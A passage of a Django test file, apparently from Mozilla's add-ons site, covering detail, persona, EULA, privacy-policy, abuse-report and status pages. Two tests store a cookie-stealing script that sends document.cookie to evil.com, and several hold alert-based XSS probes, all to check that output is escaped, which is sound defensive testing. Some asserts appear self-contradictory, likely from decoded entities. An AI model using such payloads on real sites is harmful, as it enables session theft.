r = self.client.get('/en-US/firefox/addon/icloud-bookmarks/')
assert r.status_code == 200
assert r.context['addon'] is not None
class TestDetailPage(TestCase):
fixtures = ['base/addon_3615',
'base/users',
'base/addon_59',
'base/addon_592',
'base/addon_4594_a9',
'addons/listed',
'addons/persona']
def setUp(self):
super(TestDetailPage, self).setUp()
self.addon = Addon.objects.get(id=3615)
self.url = self.addon.get_url_path()
self.more_url = self.addon.get_url_path(more=True)
def test_try_new_frontend_banner_presence(self):
response = self.client.get(self.url)
assert 'AMO is getting a new look.' not in response.content
with override_switch('try-new-frontend', active=True):
response = self.client.get(self.url)
assert 'AMO is getting a new look.' in response.content
def test_304(self):
response = self.client.get(self.url)
assert 'ETag' in response
response = self.client.get(self.url,
HTTP_IF_NONE_MATCH=response['ETag'])
assert response.status_code == 304
assert not response.content
response = self.client.get(self.url,
HTTP_IF_NONE_MATCH='random_etag_string')
assert response.status_code == 200
assert response.content
def test_site_title(self):
r = self.client.get(self.url)
assert pq(r.content)('h1.site-title').text() == 'Add-ons'
def test_addon_headings(self):
r = self.client.get(self.url)
doc = pq(r.content)
assert doc('h2:first').text() == 'About this Add-on'
assert doc('.metadata .home').text() == 'Add-on home page'
def test_anonymous_extension(self):
response = self.client.get(self.url)
assert response.status_code == 200
assert response.context['addon'].id == 3615
def test_anonymous_persona(self):
response = self.client.get(reverse('addons.detail', args=['a15663']))
assert response.status_code == 200
assert response.context['addon'].id == 15663
def test_review_microdata_personas(self):
a = Addon.objects.get(id=15663)
a.name = '<script>alert("fff")</script>'
a.save()
response = self.client.get(reverse('addons.detail', args=['a15663']))
assert (
'<script>alert("fff")</script>' in
response.content)
assert '<script>' not in response.content
def test_report_abuse_links_to_form_age(self):
response = self.client.get_ajax(
reverse('addons.detail', args=['a3615']))
doc = pq(response.content)
expected = reverse('addons.abuse', args=['3615'])
assert doc('#report-abuse').attr('href') == expected
def test_personas_context(self):
response = self.client.get(reverse('addons.detail', args=['a15663']))
assert 'review_form' in response.context
assert 'reviews' in response.context
assert 'get_replies' in response.context
def test_unreviewed_robots(self):
"""Check that unreviewed add-ons do not get indexed."""
url = self.addon.get_url_path()
m = 'meta[content=noindex]'
assert self.addon.status == amo.STATUS_PUBLIC
settings.ENGAGE_ROBOTS = True
doc = pq(self.client.get(url).content)
assert not doc(m)
settings.ENGAGE_ROBOTS = False
doc = pq(self.client.get(url).content)
assert doc(m)
self.addon.update(status=amo.STATUS_NOMINATED)
settings.ENGAGE_ROBOTS = False
doc = pq(self.client.get(url).content)
assert doc(m)
settings.ENGAGE_ROBOTS = True
doc = pq(self.client.get(url).content)
assert doc(m)
def test_more_about(self):
# Don't show more about box if there's nothing to populate it.
self.addon.developer_comments_id = None
self.addon.description_id = None
self.addon.previews.all().delete()
self.addon.save()
r = self.client.get(self.url)
doc = pq(r.content)
assert doc('#more-about').length == 0
assert doc('.article.userinput').length == 0
def test_type_redirect(self):
"""
If current add-on's type is unsupported by app, redirect to an
app that supports it.
"""
# Thunderbird can't do search engines
prefixer = amo.urlresolvers.get_url_prefix()
prefixer.app = amo.THUNDERBIRD.short
response = self.client.get(reverse('addons.detail', args=['a4594']),
follow=False)
assert response.status_code == 301
assert response['Location'].find(amo.THUNDERBIRD.short) == -1
assert (response['Location'].find(amo.FIREFOX.short) >= 0)
def test_compatible_app_redirect(self):
"""
For add-ons incompatible with the current app, redirect to one
that's supported.
"""
comp_app = self.addon.compatible_apps.keys()[0]
not_comp_app = [a for a in amo.APP_USAGE
if a not in self.addon.compatible_apps.keys()][0]
# no SeaMonkey version => redirect
prefixer = amo.urlresolvers.get_url_prefix()
prefixer.app = not_comp_app.short
r = self.client.get(reverse('addons.detail', args=[self.addon.slug]))
assert r.status_code == 301
assert r['Location'].find(not_comp_app.short) == -1
assert r['Location'].find(comp_app.short) >= 0
# compatible app => 200
prefixer = amo.urlresolvers.get_url_prefix()
prefixer.app = comp_app.short
r = self.client.get(reverse('addons.detail', args=[self.addon.slug]))
assert r.status_code == 200
def test_external_urls(self):
"""Check that external URLs are properly escaped."""
response = self.client.get(self.url)
doc = pq(response.content)
assert doc(
'aside a.home[href^="%s"]' % settings.REDIRECT_URL).length == 1
def test_no_privacy_policy(self):
"""Make sure privacy policy is not shown when not present."""
self.addon.privacy_policy_id = None
self.addon.save()
response = self.client.get(self.url)
doc = pq(response.content)
assert doc('.privacy-policy').length == 0
def test_privacy_policy(self):
self.addon.privacy_policy = 'foo bar'
self.addon.save()
response = self.client.get(self.url)
doc = pq(response.content)
assert doc('.privacy-policy').length == 1
privacy_url = reverse('addons.privacy', args=[self.addon.slug])
assert doc('.privacy-policy').attr('href').endswith(privacy_url)
def test_permissions_webext(self):
file_ = self.addon.current_version.all_files[0]
file_.update(is_webextension=True)
WebextPermission.objects.create(file=file_, permissions=[
u'http://*/*', u'<all_urls>', u'bookmarks', u'nativeMessaging',
u'made up permission'])
WebextPermissionDescription.objects.create(
name=u'bookmarks', description=u'Read and modify bookmarks')
WebextPermissionDescription.objects.create(
name=u'nativeMessaging',
description=u'Exchange messages with programs other than Firefox')
response = self.client.get(self.url)
doc = pq(response.content)
# The link next to the button
assert doc('a.webext-permissions').length == 1
# And the model dialog
assert doc('#webext-permissions').length == 1
assert u'perform certain functions (example: a tab management' in (
doc('#webext-permissions div.prose').text())
assert doc('ul.webext-permissions-list').length == 1
assert doc('li.webext-permissions-list').length == 3
# See File.webext_permissions for the order logic
assert doc('li.webext-permissions-list').text() == (
u'Access your data for all websites '
u'Exchange messages with programs other than Firefox '
u'Read and modify bookmarks')
def test_permissions_webext_no_permissions(self):
file_ = self.addon.current_version.all_files[0]
file_.update(is_webextension=True)
assert file_.webext_permissions_list == []
response = self.client.get(self.url)
doc = pq(response.content)
# Don't show the link when no permissions.
assert doc('a.webext-permissions').length == 0
# And no model dialog
assert doc('#webext-permissions').length == 0
def test_permissions_non_webext(self):
file_ = self.addon.current_version.all_files[0]
file_.update(is_webextension=False)
response = self.client.get(self.url)
doc = pq(response.content)
# The link next to the button
assert doc('a.webext-permissions').length == 1
# danger danger icon shown for oldie xul addons
assert doc('a.webext-permissions img').length == 1
# And the model dialog
assert doc('#webext-permissions').length == 1
assert u'Please note this add-on uses legacy technology' in (
doc('#webext-permissions div.prose').text())
assert doc('.webext-permissions-list').length == 0
def test_permissions_non_extension(self):
self.addon.update(type=amo.ADDON_THEME)
file_ = self.addon.current_version.all_files[0]
assert not file_.is_webextension
response = self.client.get(self.url)
doc = pq(response.content)
# Don't show the link for non-extensions
assert doc('a.webext-permissions').length == 0
# And no model dialog
assert doc('#webext-permissions').length == 0
def test_permissions_xss_single_url(self):
file_ = self.addon.current_version.all_files[0]
file_.update(is_webextension=True)
WebextPermission.objects.create(file=file_, permissions=[
u'<script>alert("//")</script>'])
response = self.client.get(self.url)
doc = pq(response.content)
assert doc('li.webext-permissions-list').text() == (
u'Access your data for '
u'<script>alert("//")</script>')
assert '<script>alert(' not in response.content
assert '<script>alert(' in response.content
def test_permissions_xss_multiple_url(self):
file_ = self.addon.current_version.all_files[0]
file_.update(is_webextension=True)
WebextPermission.objects.create(file=file_, permissions=[
'<script>alert("//")</script>',
'<script>foo("https://")</script>'])
response = self.client.get(self.url)
doc = pq(response.content)
assert doc('li.webext-permissions-list').text() == (
u'Access your data on the following websites:\n'
u'<script>alert("//")</script>\n'
u'<script>foo("https://")</script>')
assert '<script>alert(' not in response.content
assert '<script>foo(' not in response.content
assert '<script>alert(' in response.content
assert '<script>foo(' in response.content
def test_simple_html_is_rendered_in_privacy(self):
self.addon.privacy_policy = """
<strong> what the hell..</strong>
<ul>
<li>papparapara</li>
<li>todotodotodo</li>
</ul>
<ol>
<a href="irc://irc.mozilla.org/firefox">firefox</a>
Introduce yourself to the community, if you like!
This text will appear publicly on your user info page.
<li>papparapara2</li>
<li>todotodotodo2</li>
</ol>
"""
self.addon.save()
r = self.client.get(reverse('addons.privacy', args=[self.addon.slug]))
doc = pq(r.content)
assert norm(doc(".policy-statement strong")) == (
"<strong> what the hell..</strong>")
assert norm(doc(".policy-statement ul")) == (
"<ul><li>papparapara</li><li>todotodotodo</li></ul>")
assert doc(".policy-statement ol a").text() == (
"firefox")
assert norm(doc(".policy-statement ol li:first")) == (
"<li>papparapara2</li>")
def test_evil_html_is_not_rendered_in_privacy(self):
self.addon.privacy_policy = """
<script type="text/javascript">
window.location = 'http://evil.com/?c=' + document.cookie;
</script>
Muhuhahahahahahaha!
"""
self.addon.save()
r = self.client.get(reverse('addons.privacy', args=[self.addon.slug]))
doc = pq(r.content)
policy = str(doc(".policy-statement"))
assert policy.startswith(
'<div class="policy-statement"><script'), (
'Unexpected: %s' % policy[0:50])
def test_button_size(self):
"""Make sure install buttons on the detail page are prominent."""
response = self.client.get(reverse('addons.detail', args=['a3615']),
follow=True)
assert pq(response.content)('.button').hasClass('prominent')
def test_button_src_default(self):
r = self.client.get(self.url, follow=True)
assert (pq(r.content)('#addon .button').attr(
'href').endswith('?src=dp-btn-primary'))
def test_button_src_trickle(self):
r = self.client.get(self.url + '?src=trickleortreat', follow=True)
assert (pq(r.content)('#addon .button').attr(
'href').endswith('?src=trickleortreat'))
def test_version_button_src_default(self):
r = self.client.get(self.url, follow=True)
assert (pq(r.content)('#detail-relnotes .button').attr(
'href').endswith('?src=dp-btn-version'))
def test_version_button_src_trickle(self):
r = self.client.get(self.url + '?src=trickleortreat', follow=True)
assert (pq(r.content)('#detail-relnotes .button').attr(
'href').endswith('?src=trickleortreat'))
def test_version_more_link(self):
doc = pq(self.client.get(self.url).content)
versions_url = reverse('addons.versions', args=[self.addon.slug])
assert (doc('#detail-relnotes a.more-info').attr('href') ==
versions_url)
def test_invalid_version(self):
"""Only render details pages for add-ons that have a version."""
# Wipe all versions.
self.addon.versions.all().delete()
# Try accessing the details page.
response = self.client.get(self.url)
assert response.status_code == 404
def test_no_listed_authors(self):
r = self.client.get(reverse('addons.detail', args=['a59']))
# We shouldn't show an avatar since this has no listed_authors.
doc = pq(r.content)
assert 0 == len(doc('.avatar'))
def test_authors_xss(self):
name = '<script>alert(1)</script>'
user = UserProfile.objects.create(username='test',
display_name=name)
output = users_list([user])
assert "<script>alert" in output
assert "<script>alert" not in output
def test_display_compatible_apps(self):
"""
Show compatibility info for extensions but not for search engines.
"""
r = self.client.get(self.addon.get_url_path())
assert pq(r.content)('#detail-relnotes .compat').length == 1
a = Addon.objects.filter(type=amo.ADDON_SEARCH)[0]
r = self.client.get(a.get_url_path())
assert pq(r.content)('#detail-relnotes .compat').length == 0
def test_is_restart_required(self):
span_is_restart_required = (
'<span class="is-restart-required">Requires Restart</span>')
file_ = self.addon.current_version.all_files[0]
assert file_.is_restart_required is False
response = self.client.get(self.url)
assert span_is_restart_required not in response.content
file_.update(is_restart_required=True)
response = self.client.get(self.url)
assert span_is_restart_required in response.content
def test_fx57_label_is_webextension(self):
"""Test that the Firefox 57 label is being shown.
That label depends on `is_webextension` being set or
if the add-on is a mozilla internally signed add-on.
"""
file_ = self.addon.current_version.all_files[0]
assert file_.is_webextension is False
response = self.client.get(self.url)
doc = pq(response.content)
assert not doc('a.is-webextension')
file_.update(is_webextension=True, is_restart_required=False)
assert file_.is_webextension is True
response = self.client.get(self.url)
doc = pq(response.content)
link = doc('a.is-webextension')
assert (
link.attr['href'] ==
'https://support.mozilla.org/kb/firefox-add-technology-modernizing'
)
def test_fx57_label_is_mozilla_signed_extension(self):
"""Test that the Firefox 57 label is being shown.
That label depends on `is_webextension` being set or
if the add-on is a mozilla internally signed add-on.
"""
file_ = self.addon.current_version.all_files[0]
assert file_.is_mozilla_signed_extension is False
response = self.client.get(self.url)
doc = pq(response.content)
assert not doc('a.is-webextension')
file_.update(is_mozilla_signed_extension=True)
assert file_.is_mozilla_signed_extension is True
response = self.client.get(self.url)
doc = pq(response.content)
link = doc('a.is-webextension')
assert (
link.attr['href'] ==
'https://support.mozilla.org/kb/firefox-add-technology-modernizing'
)
def test_version_displayed(self):
response = self.client.get(self.url)
doc = pq(response.content)
assert doc('.version-number').text() == '2.1.072'
def test_disabled_user_message(self):
self.addon.update(disabled_by_user=True)
res = self.client.get(self.url)
assert res.status_code == 404
assert 'removed by its author' in res.content
def test_disabled_status_message(self):
self.addon.update(status=amo.STATUS_DISABLED)
res = self.client.get(self.url)
assert res.status_code == 404
assert 'disabled by an administrator' in res.content
def test_deleted_status_message(self):
addon = Addon.objects.get(id=3615)
addon.update(status=amo.STATUS_DELETED)
url = reverse('addons.detail', args=[addon.slug])
res = self.client.get(url)
assert res.status_code == 404
def test_more_url(self):
response = self.client.get(self.url)
assert pq(response.content)('#more-webpage').attr('data-more-url') == (
self.addon.get_url_path(more=True))
def test_unlisted_addon_returns_404(self):
"""Unlisted addons are not listed and return 404."""
self.make_addon_unlisted(self.addon)
assert self.client.get(self.url).status_code == 404
def test_admin_buttons(self):
def get_detail():
return self.client.get(reverse('addons.detail', args=['a3615']),
follow=True)
# No login, no buttons.
assert pq(get_detail().content)('.manage-button').length == 0
# No developer, no buttons.
self.client.login(email='regular@mozilla.com')
assert pq(get_detail().content)('.manage-button').length == 0
# developer gets a 'Manage' button to devhub
self.client.login(email='del@icio.us')
content = get_detail().content
assert pq(content)('.manage-button').length == 1
assert pq(content)('.manage-button a').eq(0).attr('href') == (
self.addon.get_dev_url())
# reviewer gets an 'Add-on Review' button
self.client.login(email='reviewer@mozilla.com')
content = get_detail().content
assert pq(content)('.manage-button').length == 1
assert pq(content)('.manage-button a').eq(0).attr('href') == (
reverse('reviewers.review', args=[self.addon.slug]))
# admins gets devhub, 'Add-on Review' and 'Admin Manage' button too
self.client.login(email='admin@mozilla.com')
content = get_detail().content
assert pq(content)('.manage-button').length == 3
assert pq(content)('.manage-button a').eq(0).attr('href') == (
self.addon.get_dev_url())
assert pq(content)('.manage-button a').eq(1).attr('href') == (
reverse('reviewers.review', args=[self.addon.slug]))
assert pq(content)('.manage-button a').eq(2).attr('href') == (
reverse('zadmin.addon_manage', args=[self.addon.slug]))
def test_reviews(self):
def create_review(body='review text'):
return Rating.objects.create(
addon=self.addon, user=user_factory(),
rating=random.randrange(0, 6),
body=body)
url = reverse('addons.detail', args=['a3615'])
create_review()
response = self.client.get(url, follow=True)
assert len(response.context['reviews']) == 1
# Add a new review but with no body - shouldn't be shown on detail page
create_review(body=None)
response = self.client.get(url, follow=True)
assert len(response.context['reviews']) == 1
# Test one last time in case caching
create_review()
response = self.client.get(url, follow=True)
assert len(response.context['reviews']) == 2
def get_pq(self):
return pq(self.client.get(self.url).content)
def test_adu_stats_private(self):
assert not self.addon.public_stats
adu = self.get_pq()('#daily-users')
assert adu.length == 1
assert adu.find('a').length == 0
def test_adu_stats_public(self):
self.addon.update(public_stats=True)
assert self.addon.show_adu()
adu = self.get_pq()('#daily-users')
# Check that ADU does link to public statistics dashboard.
assert adu.find('a').attr('href') == (
reverse('stats.overview', args=[self.addon.slug]))
# Check formatted count.
assert adu.text().split()[0] == numberfmt(
self.addon.average_daily_users)
# Check if we hide link when there are no ADU.
self.addon.update(average_daily_users=0)
assert self.get_pq()('#daily-users').length == 0
def test_adu_stats_regular(self):
self.client.login(email='regular@mozilla.com')
# Should not be a link to statistics dashboard for regular users.
adu = self.get_pq()('#daily-users')
assert adu.length == 1
assert adu.find('a').length == 0
def test_adu_stats_admin(self):
self.client.login(email='del@icio.us')
# Check link to statistics dashboard for add-on authors.
assert self.get_pq()('#daily-users a.stats').attr('href') == (
reverse('stats.overview', args=[self.addon.slug]))
def test_downloads_stats_private(self):
self.addon.update(type=amo.ADDON_SEARCH)
assert not self.addon.public_stats
adu = self.get_pq()('#weekly-downloads')
assert adu.length == 1
assert adu.find('a').length == 0
def test_downloads_stats_public(self):
self.addon.update(public_stats=True, type=amo.ADDON_SEARCH)
assert not self.addon.show_adu()
dls = self.get_pq()('#weekly-downloads')
# Check that weekly downloads links to statistics dashboard.
assert dls.find('a').attr('href') == (
reverse('stats.overview', args=[self.addon.slug]))
# Check formatted count.
assert dls.text().split()[0] == numberfmt(self.addon.weekly_downloads)
# Check if we hide link when there are no weekly downloads.
self.addon.update(weekly_downloads=0)
assert self.get_pq()('#weekly-downloads').length == 0
def test_downloads_stats_regular(self):
self.addon.update(type=amo.ADDON_SEARCH)
self.client.login(email='regular@mozilla.com')
# Should not be a link to statistics dashboard for regular users.
dls = self.get_pq()('#weekly-downloads')
assert dls.length == 1
assert dls.find('a').length == 0
def test_downloads_stats_admin(self):
self.addon.update(public_stats=True, type=amo.ADDON_SEARCH)
self.client.login(email='del@icio.us')
# Check link to statistics dashboard for add-on authors.
assert self.get_pq()('#weekly-downloads a.stats').attr('href') == (
reverse('stats.overview', args=[self.addon.slug]))
def test_dependencies(self):
assert self.get_pq()('.dependencies').length == 0
req = Addon.objects.get(id=592)
AddonDependency.objects.create(addon=self.addon, dependent_addon=req)
assert self.addon.all_dependencies == [req]
cache.clear()
d = self.get_pq()('.dependencies .hovercard')
assert d.length == 1
assert d.find('h3').text() == unicode(req.name)
assert d.find('a').attr('href').endswith('?src=dp-dl-dependencies')
assert d.find('.install-button a').attr('href').endswith(
'?src=dp-hc-dependencies')
def test_license_link_builtin(self):
g = 'http://google.com'
version = self.addon._current_version
license = version.license
license.builtin = 1
license.name = 'License to Kill'
license.url = g
license.save()
assert license.builtin == 1
assert license.url == g
a = self.get_pq()('.secondary.metadata .source-license a')
assert a.attr('href') == g
assert a.text() == 'License to Kill'
def test_license_builtin_creative_commons(self):
g = 'http://google.com'
version = self.addon._current_version
constant = LICENSES_BY_BUILTIN[11]
license = version.license
license.builtin = 11
license.name = 'License to Kill' # Will be overriden by constant
license.url = g
license.save()
assert license._constant == constant
assert license.builtin == 11
assert license.url == g
a = self.get_pq()('.secondary.metadata .source-license a')
assert a.attr('href') == g
assert a.text() == constant.name
def test_license_link_custom(self):
version = self.addon._current_version
assert version.license.url is None
a = self.get_pq()('.secondary.metadata .source-license a')
assert a.attr('href') == version.license_url()
assert a.attr('target') is None
assert a.text() == 'Custom License'
def get_more_pq(self):
return pq(self.client.get_ajax(self.more_url).content)
def test_other_addons(self):
"""Ensure listed add-ons by the same author show up."""
other = Addon.objects.get(id=592)
Addon.objects.get(id=4594).delete()
assert list(Addon.objects.listed(amo.FIREFOX).exclude(
id=self.addon.id)) == [other]
add_addon_author(other, self.addon)
doc = self.get_more_pq()('#author-addons')
_test_hovercards(self, doc, [other], src='dp-dl-othersby')
def test_other_addons_no_unlisted(self):
"""An unlisted add-on by the same author should not show up."""
other = Addon.objects.get(id=592)
other.update(status=amo.STATUS_NOMINATED, disabled_by_user=True)
add_addon_author(other, self.addon)
assert self.get_more_pq()('#author-addons').length == 0
def test_other_addons_by_others(self):
"""Add-ons by different authors should not show up."""
author = UserProfile.objects.get(pk=999)
AddonUser.objects.create(addon=self.addon, user=author, listed=True)
assert self.get_more_pq()('#author-addons').length == 0
def test_other_addons_none(self):
assert self.get_more_pq()('#author-addons').length == 0
def test_categories(self):
links = self.get_more_pq()('#related ul:first').find('a')
expected = [(unicode(c.name), c.get_url_path())
for c in self.addon.categories.filter(
application=amo.FIREFOX.id)]
amo.tests.check_links(expected, links)
def test_static_theme_detail(self):
self.addon.update(type=amo.ADDON_STATICTHEME)
version_preview = VersionPreview.objects.create(
version=self.addon.current_version)
response = self.client.get(self.url)
assert response.status_code == 200
doc = pq(response.content)
assert doc('.previews')
assert len(doc('.previews li.panel')) == 1
img = doc('.previews li.panel img')[0]
assert img.attrib['src'] == version_preview.thumbnail_url
class TestPersonas(object):
fixtures = ['addons/persona', 'base/users']
def create_addon_user(self, addon):
return AddonUser.objects.create(addon=addon, user_id=999)
# Overwrite the caches setting to a MemcachedCache backend to test a
# regression that caused cache-keys to be longer than 250 characters
# https://github.com/mozilla/addons-server/issues/8598
cache_settings = settings.CACHES.copy()
cache_settings['default'] = {
'BACKEND': 'django.core.cache.backends.memcached.MemcachedCache',
'LOCATION': os.environ.get('MEMCACHE_LOCATION', 'localhost:11211'),
}
@override_settings(CACHES=cache_settings)
class TestPersonaDetailPage(TestPersonas, TestCase):
def setUp(self):
super(TestPersonas, self).setUp()
self.addon = Addon.objects.get(id=15663)
self.persona = self.addon.persona
self.url = self.addon.get_url_path()
self.create_addon_user(self.addon)
def test_persona_images(self):
r = self.client.get(self.url)
doc = pq(r.content)
assert doc('h2.addon img').attr('src') == self.persona.icon_url
style = doc('#persona div[data-browsertheme]').attr('style')
assert self.persona.preview_url in style, (
'style attribute %s does not link to %s' % (
style, self.persona.preview_url))
def test_more_personas(self):
other = addon_factory(type=amo.ADDON_PERSONA)
self.create_addon_user(other)
r = self.client.get(self.url)
assert pq(r.content)('#more-artist .more-link').length == 1
def test_not_personas(self):
other = addon_factory(type=amo.ADDON_EXTENSION)
self.create_addon_user(other)
r = self.client.get(self.url)
assert pq(r.content)('#more-artist .more-link').length == 0
def test_new_more_personas(self):
other = addon_factory(type=amo.ADDON_PERSONA)
self.create_addon_user(other)
self.persona.persona_id = 0
self.persona.save()
r = self.client.get(self.url)
profile = UserProfile.objects.get(id=999).get_url_path()
assert pq(r.content)('#more-artist .more-link').attr('href') == (
profile + '?src=addon-detail')
def test_other_personas(self):
"""Ensure listed personas by the same author show up."""
addon_factory(type=amo.ADDON_PERSONA, status=amo.STATUS_NULL)
addon_factory(type=amo.ADDON_PERSONA, status=amo.STATUS_PUBLIC)
addon_factory(type=amo.ADDON_PERSONA, disabled_by_user=True)
other = addon_factory(type=amo.ADDON_PERSONA)
self.create_addon_user(other)
assert other.status == amo.STATUS_PUBLIC
assert not other.disabled_by_user
r = self.client.get(self.url)
assert list(r.context['author_personas']) == [other]
a = pq(r.content)('#more-artist .persona.hovercard > a')
assert a.length == 1
assert a.attr('href') == other.get_url_path()
def _test_by(self):
"""Test that the by... bit works."""
r = self.client.get(self.url)
assert pq(r.content)('h4.author').text().startswith('by regularuser')
def test_by(self):
self._test_by()
def test_personas_categories(self):
static_category = (
CATEGORIES[amo.FIREFOX.id][amo.ADDON_PERSONA]['film-and-tv'])
category = Category.from_static_category(static_category, True)
AddonCategory.objects.create(addon=self.addon, category=category)
r = self.client.get(self.url)
assert (
pq(r.content)('#more-category>h3').text() ==
'More Film and TV Themes')
class TestStatus(TestCase):
fixtures = ['base/addon_3615', 'addons/persona']
def setUp(self):
super(TestStatus, self).setUp()
self.addon = Addon.objects.get(id=3615)
self.version = self.addon.current_version
self.file = self.version.all_files[0]
assert self.addon.status == amo.STATUS_PUBLIC
self.url = self.addon.get_url_path()
self.persona = Addon.objects.get(id=15663)
assert self.persona.status == amo.STATUS_PUBLIC
self.persona_url = self.persona.get_url_path()
def test_incomplete(self):
self.addon.update(status=amo.STATUS_NULL)
assert self.client.get(self.url).status_code == 404
def test_pending(self):
self.addon.update(status=amo.STATUS_PENDING)
assert self.client.get(self.url).status_code == 404
def test_nominated(self):
self.addon.update(status=amo.STATUS_NOMINATED)
assert self.client.get(self.url).status_code == 200
def test_public(self):
self.addon.update(status=amo.STATUS_PUBLIC)
assert self.client.get(self.url).status_code == 200
def test_deleted(self):
self.addon.update(status=amo.STATUS_DELETED)
assert self.client.get(self.url).status_code == 404
def test_disabled(self):
self.addon.update(status=amo.STATUS_DISABLED)
assert self.client.get(self.url).status_code == 404
def test_disabled_by_user(self):
self.addon.update(disabled_by_user=True)
assert self.client.get(self.url).status_code == 404
def test_persona(self):
for status in Persona.STATUS_CHOICES.keys():
if status == amo.STATUS_DELETED:
continue
self.persona.status = status
self.persona.save()
assert self.client.head(self.persona_url).status_code == (
200 if status in [amo.STATUS_PUBLIC, amo.STATUS_PENDING]
else 404)
def test_persona_disabled(self):
for status in Persona.STATUS_CHOICES.keys():
if status == amo.STATUS_DELETED:
continue
self.persona.status = status
self.persona.disabled_by_user = True
self.persona.save()
assert self.client.head(self.persona_url).status_code == 404
class TestTagsBox(TestCase):
fixtures = ['base/addontag']
def test_tag_box(self):
"""Verify that we don't show duplicate tags."""
r = self.client.get_ajax(reverse('addons.detail_more', args=[8680]),
follow=True)
doc = pq(r.content)
assert 'SEO' == doc('#tagbox ul').children().text()
class TestEulaPolicyRedirects(TestCase):
def test_eula_legacy_url(self):
"""
See that we get a 301 to the zamboni style URL
"""
response = self.client.get('/en-US/firefox/addons/policy/0/592/42')
assert response.status_code == 301
assert (response['Location'].find('/addon/592/eula/42') != -1)
def test_policy_legacy_url(self):
"""
See that we get a 301 to the zamboni style URL
"""
response = self.client.get('/en-US/firefox/addons/policy/0/592/')
assert response.status_code == 301
assert (response['Location'].find('/addon/592/privacy/') != -1)
class TestEula(TestCase):
fixtures = ['addons/eula+contrib-addon']
def setUp(self):
super(TestEula, self).setUp()
self.addon = Addon.objects.get(id=11730)
self.url = self.get_url()
def get_url(self, args=None):
if args is None:
args = []
return reverse('addons.eula', args=[self.addon.slug] + args)
def test_current_version(self):
r = self.client.get(self.url)
assert r.context['version'] == self.addon.current_version
def test_simple_html_is_rendered(self):
self.addon.eula = """
<strong> what the hell..</strong>
<ul>
<li>papparapara</li>
<li>todotodotodo</li>
</ul>
<ol>
<a href="irc://irc.mozilla.org/firefox">firefox</a>
Introduce yourself to the community, if you like!
This text will appear publicly on your user info page.
<li>papparapara2</li>
<li>todotodotodo2</li>
</ol>
"""
self.addon.save()
r = self.client.get(self.url)
doc = pq(r.content)
assert norm(doc('.policy-statement strong')) == (
'<strong> what the hell..</strong>')
assert norm(doc('.policy-statement ul')) == (
'<ul><li>papparapara</li><li>todotodotodo</li></ul>')
assert doc('.policy-statement ol a').text() == 'firefox'
assert norm(doc('.policy-statement ol li:first')) == (
'<li>papparapara2</li>')
def test_evil_html_is_not_rendered(self):
self.addon.eula = """
<script type="text/javascript">
window.location = 'http://evil.com/?c=' + document.cookie;
</script>
Muhuhahahahahahaha!
"""
self.addon.save()
r = self.client.get(self.url)
doc = pq(r.content)
policy = str(doc('.policy-statement'))
assert policy.startswith('<div class="policy-statement"><script'), (
'Unexpected: %s' % policy[:50])
def test_old_version(self):
old = self.addon.versions.order_by('created')[0]
assert old != self.addon.current_version
r = self.client.get(self.get_url([old.all_files[0].id]))
assert r.context['version'] == old
def test_deleted_version(self):
old = self.addon.versions.order_by('created')[0]
assert old != self.addon.current_version
old.delete()
response = self.client.get(self.get_url([old.all_files[0].id]))
assert response.status_code == 404
def test_redirect_no_eula(self):
self.addon.update(eula=None)
r = self.client.get(self.url, follow=True)
self.assert3xx(r, self.addon.get_url_path())
def test_cat_sidebar(self):
check_cat_sidebar(self.url, self.addon)
class TestXssOnName(amo.tests.TestXss):
def test_eula_page(self):
url = reverse('addons.eula', args=[self.addon.slug])
self.assertNameAndNoXSS(url)
def test_detail_page(self):
url = reverse('addons.detail', args=[self.addon.slug])
self.assertNameAndNoXSS(url)
def test_privacy_page(self):
url = reverse('addons.privacy', args=[self.addon.slug])
self.assertNameAndNoXSS(url)
def test_reviews_list(self):
url = reverse('addons.ratings.list', args=[self.addon.slug])
self.assertNameAndNoXSS(url)
def test_reviews_add(self):
url = reverse('addons.ratings.add', args=[self.addon.slug])
self.client.login(email='fligtar@gmail.com')
self.assertNameAndNoXSS(url)
class TestPrivacyPolicy(TestCase):
fixtures = ['addons/eula+contrib-addon']
def setUp(self):
super(TestPrivacyPolicy, self).setUp()
self.addon = Addon.objects.get(id=11730)
self.url = reverse('addons.privacy', args=[self.addon.slug])
def test_redirect_no_eula(self):
assert self.addon.privacy_policy is None
r = self.client.get(self.url, follow=True)
self.assert3xx(r, self.addon.get_url_path())
def test_cat_sidebar(self):
self.addon.privacy_policy = 'shizzle'
self.addon.save()
check_cat_sidebar(self.url, self.addon)
@patch.object(settings, 'NOBOT_RECAPTCHA_PRIVATE_KEY', 'something')
class TestReportAbuse(TestCase):
fixtures = ['addons/persona', 'base/addon_3615', 'base/users']
def setUp(self):
super(TestReportAbuse, self).setUp()
self.full_page = reverse('addons.abuse', args=['a3615'])
@patch('olympia.amo.fields.ReCaptchaField.clean')
def test_abuse_anonymous(self, clean):
clean.return_value = ""
self.client.post(self.full_page, {'text': 'spammy'})
assert len(mail.outbox) == 1
assert 'spammy' in mail.outbox[0].body
report = AbuseReport.objects.get(addon=3615)
assert report.message == 'spammy'
assert report.reporter is None
def test_abuse_anonymous_fails(self):
r = self.client.post(self.full_page, {'text': 'spammy'})
assert 'recaptcha' in r.context['abuse_form'].errors
def test_abuse_logged_in(self):
self.client.login(email='regular@mozilla.com')
self.client.post(self.full_page, {'text': 'spammy'})
assert len(mail.outbox) == 1
assert 'spammy' in mail.outbox[0].body
report = AbuseReport.objects.get(addon=3615)
assert report.message == 'spammy'
assert report.reporter.email == 'regular@mozilla.com'
def test_abuse_name(self):
addon = Addon.objects.get(pk=3615)
addon.name = 'Bmrk.ru Социальные закладки'
addon.save()
self.client.login(email='regular@mozilla.com')
self.client.post(self.full_page, {'text': 'spammy'})
assert 'spammy' in mail.outbox[0].body
assert AbuseReport.objects.get(addon=addon)
def test_abuse_persona(self):
shared_url = reverse('addons.detail', args=['a15663'])
r = self.client.get(shared_url)
doc = pq(r.content)
assert doc("fieldset.abuse")
# and now just test it works
self.client.login(email='regular@mozilla.com')
r = self.client.post(reverse('addons.abuse', args=['a15663']),
{'text': 'spammy'})
self.assert3xx(r, shared_url)
assert len(mail.outbox) == 1
assert 'spammy' in mail.outbox[0].body
assert AbuseReport.objects.get(addon=15663)
class TestFindReplacement(TestCase):
def test_no_match(self):
self.url = reverse('addons.find_replacement') + '?guid=xxx'
response = self.client.get(self.url)
self.assert3xx(
response,
DEFAULT_FIND_REPLACEMENT_PATH + '?src=%s' % FIND_REPLACEMENT_SRC)
def test_match(self):
addon_factory(slug='replacey')
ReplacementAddon.objects.create(guid='xxx', path='/addon/replacey/')
